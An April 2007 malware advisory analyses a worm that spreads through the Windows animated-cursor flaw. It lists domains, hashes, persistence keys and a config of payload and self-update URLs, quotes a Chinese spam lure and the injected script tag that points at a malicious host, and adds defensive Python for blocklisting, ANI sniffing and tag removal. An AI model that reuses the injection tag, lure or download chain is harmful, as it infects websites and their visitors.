Bad news: the Windows Animated Cursor Handling zero-day vulnerability is now being used by malware in China. We received a new worm of this kind today. It behaves like Worm.Win32.Fujacks: it infects .HTML, .ASPX, .HTM, .PHP, .JSP, .ASP and .EXE files, inserts links that lead to the Animated Cursor exploit into the .HTML, .ASPX, .HTM, .PHP, .JSP and .ASP files, and sends out Chinese-language spam carrying the same exploit link.
The author is still updating the worm; we have received variants with different sizes and MD5 hashes. The worm is downloaded from the following domains, which we suggest all users block now:
2007ip.com
microfsot.com
The worm is about 13K in size. The MD5 hashes are:
99720c731d19512678d9594867024e7e
4ebca8337797302fc6003eb50dd6237d
e9100ce97a5b4fbd8857b25ffe2d7179
Kaspersky detects two of them as Trojan-Downloader.Win32.Agent.bky.
Detailed technical report on this worm:
1. Upon execution, it drops the following file:
%SYSTEM%\sysload3.exe
2. Adds the following registry entry so that it runs at every logon:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
"System Boot Check"="%SYSTEM%\sysload3.exe"
3. Uses an IE process to download the config file from:
http://a.2007ip.com/<removed>.css
The content of this config file:
[config]
Version=1.0.6
NUM=7
1=http://a.2007ip.com/<removed>/01.gif
2=http://a.2007ip.com/<removed>/02.gif
3=http://a.2007ip.com/<removed>/03.gif
4=http://a.2007ip.com/<removed>/04.gif
5=http://a.2007ip.com/<removed>/05.gif
6=http://a.2007ip.com/<removed>/06.gif
7=http://a.2007ip.com/<removed>/07.gif
hos=http://if.iloveck.com/<removed>/hos.gif
UpdateMe=http://a.2007ip.com/5949645<removed>.exe
tongji=http://if.iloveck.com/<removed>/tongji.htm
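The config above is a plain key=value file under a [config] header: NUM gives the count of numbered payload URLs, and the three named keys point at further resources (UpdateMe is evidently the self-update binary; "tongji" is Chinese for "statistics", so that entry is presumably a hit counter, which is my reading, not something the report states). The following is an added example, not code from the original report: it parses a config of this shape and turns every URL in it into a host blocklist. SAMPLE_CONFIG is constructed from the layout shown above, keeping the report's <removed> redactions as literal placeholders.

```python
"""Parse the worm's INI-style config and derive a host blocklist.

Added example; not code from the original report. SAMPLE_CONFIG is
constructed from the layout shown in the report, keeping its <removed>
redactions as literal placeholders.
"""
import configparser
from urllib.parse import urlparse

SAMPLE_CONFIG = """\
[config]
Version=1.0.6
NUM=7
1=http://a.2007ip.com/<removed>/01.gif
2=http://a.2007ip.com/<removed>/02.gif
3=http://a.2007ip.com/<removed>/03.gif
4=http://a.2007ip.com/<removed>/04.gif
5=http://a.2007ip.com/<removed>/05.gif
6=http://a.2007ip.com/<removed>/06.gif
7=http://a.2007ip.com/<removed>/07.gif
hos=http://if.iloveck.com/<removed>/hos.gif
UpdateMe=http://a.2007ip.com/5949645<removed>.exe
tongji=http://if.iloveck.com/<removed>/tongji.htm
"""


def parse_worm_config(text):
    """Return (version, numbered payload URLs in order, named URLs).

    configparser handles the format directly; interpolation is disabled so a
    '%' inside a URL cannot break parsing, and optionxform is overridden so
    key case (UpdateMe) survives instead of being lower-cased.
    """
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str
    cp.read_string(text)
    sec = cp["config"]
    count = int(sec.get("NUM", "0"))
    # NUM is only an upper bound: a missing index is skipped, not an error.
    numbered = [sec[str(i)] for i in range(1, count + 1) if str(i) in sec]
    named = {k: v for k, v in sec.items()
             if k not in ("Version", "NUM") and not k.isdigit()}
    return sec.get("Version"), numbered, named


def blocklist_hosts(text):
    """Every hostname the config points at, sorted, for a DNS/proxy block rule."""
    _, numbered, named = parse_worm_config(text)
    hosts = set()
    for url in numbered + list(named.values()):
        host = urlparse(url).hostname
        if host:
            hosts.add(host.lower())
    return sorted(hosts)


def hosts_file_entries(text):
    """Render the blocklist as lines suitable for a hosts-file sinkhole."""
    return ["0.0.0.0 " + h for h in blocklist_hosts(text)]


if __name__ == "__main__":
    version, numbered, named = parse_worm_config(SAMPLE_CONFIG)
    print("config version", version, "with", len(numbered), "payload URLs")
    for key, url in named.items():
        print(f"  {key:9s} {url}")
    print("\n".join(hosts_file_entries(SAMPLE_CONFIG)))
```

Blocking by hostname rather than by full URL is deliberate: the paths are redacted here and, in any case, the author is changing them between variants, while the two domains are what all the samples share.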
5. It also spreads via email, in the following form:
From: i_love_cq@sohu.com
To: [random number]@qq.com
Subject: 你和谁视频的时候被拍下的?给你笑死了! (translation: Who were you video chatting with when this was filmed? It's hilarious!)
Body:
看你那小样!我看你是出名了! (Look at you! I'd say you've become famous!)
你看这个地址!你的脸拍的那么清楚!你变明星了! (Look at this link! Your face is captured so clearly! You're a star now!)
http://macr.microfsot.com/<removed>/134952.htm
The page at this URL contains two further links:
http://macr.microfsot.com/<removed>/NOINDEX.HTM
That page uses the .ani vulnerability and contains two URLs:
http://macr.microfsot.com/<removed>/1.jpg
http://macr.microfsot.com/<removed>/2.jpg
These two files are crafted .ANI files, used to download a copy of the worm from:
http://a.2007ip.com/cs<removed>.exe
6. Infects .HTML, .ASPX, .HTM, .PHP, .JSP, .ASP and .EXE files, and inserts the following malicious link, which leads to the Windows Animated Cursor Handling exploit, into the .HTML, .ASPX, .HTM, .PHP, .JSP and .ASP files:
<script src=http://macr.microfsot.com/<removed>.js></script>
This script in turn references another malicious URL:
http://macr.microfsot.com/Ad<removed>.jpg
This is a crafted .ANI file, used to download a copy of the worm from:
http://a.2007ip.com/5949645<removed>.exe
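Steps 5 and 6 both rely on crafted animated cursors served under image names (1.jpg, 2.jpg, Ad<removed>.jpg), so scanning by file extension misses them; a scanner has to look at content. The following is an added example, not code from the original report or from the worm: it sniffs files for the RIFF/ACON container regardless of name and flags any anih chunk whose declared length is not the 36 bytes of a legitimate ANIHEADER (a fixed-size structure of nine 32-bit fields). Treating an over-long anih chunk as the tell-tale of a crafted cursor is my assumption about this exploit class, not something the report states; the sample files are constructed here.

```python
"""Flag files that are really RIFF/ACON animated cursors, whatever their
extension, and report anih chunks whose declared size is not the 36-byte
ANIHEADER.

Added example, not code from the original report. The sample files are
constructed; the "anih size != 36" heuristic is the author's assumption about
how a crafted cursor differs from a legitimate one.
"""
import struct

ANIHEADER_SIZE = 36  # sizeof(ANIHEADER): nine 32-bit fields, fixed for every valid cursor


def _chunk(fourcc, payload):
    """RIFF chunk: 4-byte id, little-endian length, payload, pad byte if odd."""
    data = fourcc + struct.pack("<I", len(payload)) + payload
    return data + (b"\x00" if len(payload) % 2 else b"")


def build_ani(chunks):
    """Wrap chunks in a RIFF container with the ACON form type."""
    body = b"ACON" + b"".join(chunks)
    return b"RIFF" + struct.pack("<I", len(body)) + body


# Constructed samples: a well-formed cursor, and one carrying a second, oversized
# anih chunk behind a valid first header (served under a .jpg name, as in the report).
VALID_ANIH = struct.pack("<9I", ANIHEADER_SIZE, 1, 1, 32, 32, 32, 1, 10, 1)
BENIGN_ANI = build_ani([
    _chunk(b"anih", VALID_ANIH),
    _chunk(b"LIST", b"fram" + _chunk(b"icon", b"\x00" * 22)),
])
CRAFTED_ANI = build_ani([
    _chunk(b"anih", VALID_ANIH),   # first header looks legitimate
    _chunk(b"anih", b"A" * 40),    # second header declares 40 bytes, more than the structure holds
])


def is_ani(data):
    """Content sniffing: RIFF magic plus ACON form type, independent of file name."""
    return len(data) >= 12 and data[:4] == b"RIFF" and data[8:12] == b"ACON"


def _iter_chunks(data, start, end):
    pos = start
    while pos + 8 <= end:
        fourcc = data[pos:pos + 4]
        size = struct.unpack_from("<I", data, pos + 4)[0]
        yield fourcc, size, pos
        pos += 8 + size + (size & 1)   # a huge bogus size simply ends the walk


def bad_anih_chunks(data):
    """All anih chunks (top level or nested in LIST) with size != 36: [(offset, size)]."""
    found = []

    def walk(start, end):
        for fourcc, size, off in _iter_chunks(data, start, end):
            if fourcc == b"anih" and size != ANIHEADER_SIZE:
                found.append((off, size))
            elif fourcc == b"LIST":
                walk(off + 12, min(off + 8 + size, end))  # skip id, length and list type

    walk(12, len(data))
    return found


def classify(data):
    if not is_ani(data):
        return "not-ani"
    return "ani-suspicious" if bad_anih_chunks(data) else "ani-ok"


def scan(files):
    """files: {name: bytes}. Returns {name: bad chunks} for every suspicious cursor."""
    return {name: bad_anih_chunks(data) for name, data in files.items()
            if classify(data) == "ani-suspicious"}


if __name__ == "__main__":
    samples = {"cursor.ani": BENIGN_ANI, "1.jpg": CRAFTED_ANI,
               "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16}
    for name, data in samples.items():
        print(name, classify(data))
    print(scan(samples))
```

Run over a web root or a proxy cache, this turns up the cursor payloads even when they sit behind .jpg and .gif names; a file that sniffs as ACON but is served with an image name is worth a look on its own, which is why classify reports "ani-ok" rather than silently passing such files.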
7. In the body of the worm, the author says that he or she hates Kaspersky.
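The web-file infection in step 6 is a single appended tag, so cleanup on a compromised web server comes down to finding script includes that point off-site and stripping them. The following is an added example, not code from the original report: it scans the extensions listed in step 6 for <script src=...></script> tags whose host is not on an allowlist, reports them, and removes them. The sample site, the allowlist host cdn.example.org and the script path example.js are constructed (the report redacts the real script name).

```python
"""Find and strip the worm's injected <script src=...></script> tag from web files.

Added example, not code from the original report. The sample files, the
allowlist and the 'example.js' path are constructed; the report redacts the
real script name.
"""
import os
import re
from urllib.parse import urlparse

WEB_EXTS = {".html", ".htm", ".asp", ".aspx", ".php", ".jsp"}

# Matches the minimal form the worm writes (unquoted src, empty body) and the
# quoted form; attributes placed before src are not handled, which this strain
# does not need.
SCRIPT_RE = re.compile(
    r"""<script\s+src=["']?([^"'\s>]+)["']?\s*>\s*</script>""", re.IGNORECASE)

TRUSTED_HOSTS = {"cdn.example.org"}   # constructed allowlist for the sample site

INJECTED = "<script src=http://macr.microfsot.com/example.js></script>"
SAMPLE_TREE = {
    "index.html": '<html><head><script src="/js/app.js"></script>\n'
                  '<script src="http://cdn.example.org/lib.js"></script></head>\n'
                  "<body>hello</body></html>" + INJECTED,
    "news.asp": "<%@ Language=VBScript %><html><body>news</body></html>" + INJECTED,
    "style.css": "body { color: black }",
    "notes.txt": INJECTED,   # not a web file by extension: left alone
}


def _is_foreign(src, trusted_hosts):
    """True for absolute URLs whose host is not allowlisted; a relative src is same-origin."""
    host = urlparse(src).hostname
    return host is not None and host.lower() not in trusted_hosts


def injected_scripts(html, trusted_hosts):
    """URLs of off-site script includes found in one page."""
    return [m.group(1) for m in SCRIPT_RE.finditer(html)
            if _is_foreign(m.group(1), trusted_hosts)]


def clean_page(html, trusted_hosts):
    """Return (cleaned html, list of removed script URLs); trusted includes are kept."""
    removed = []

    def repl(m):
        src = m.group(1)
        if _is_foreign(src, trusted_hosts):
            removed.append(src)
            return ""
        return m.group(0)

    return SCRIPT_RE.sub(repl, html), removed


def scan_tree(files, trusted_hosts):
    """files: {path: text}. Returns {path: [foreign script URLs]} for web files only."""
    report = {}
    for path, text in files.items():
        if os.path.splitext(path)[1].lower() not in WEB_EXTS:
            continue
        hits = injected_scripts(text, trusted_hosts)
        if hits:
            report[path] = hits
    return report


if __name__ == "__main__":
    for path, urls in scan_tree(SAMPLE_TREE, TRUSTED_HOSTS).items():
        cleaned, removed = clean_page(SAMPLE_TREE[path], TRUSTED_HOSTS)
        print(path, "removed", removed)
```

An allowlist of hosts is the right knob here: a site legitimately includes scripts from its own CDN, and a scanner that simply deletes every absolute script src would break the pages it is meant to repair. The .EXE infection in step 6 is a separate problem and is not addressed by this script; infected binaries need to be restored from known-good copies.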

1st Update 11:00pm, Apr.1, 2007
McAfee has added detection: W32/Fujacks.aa
Kaspersky has added another detection: Trojan-Downloader.Win32.Agent.bkp
Symantec has added detection: W32.Fubalca
F-Secure has added detection: Agent.bky
Last modified by smallmo on April 13, 2007 23:32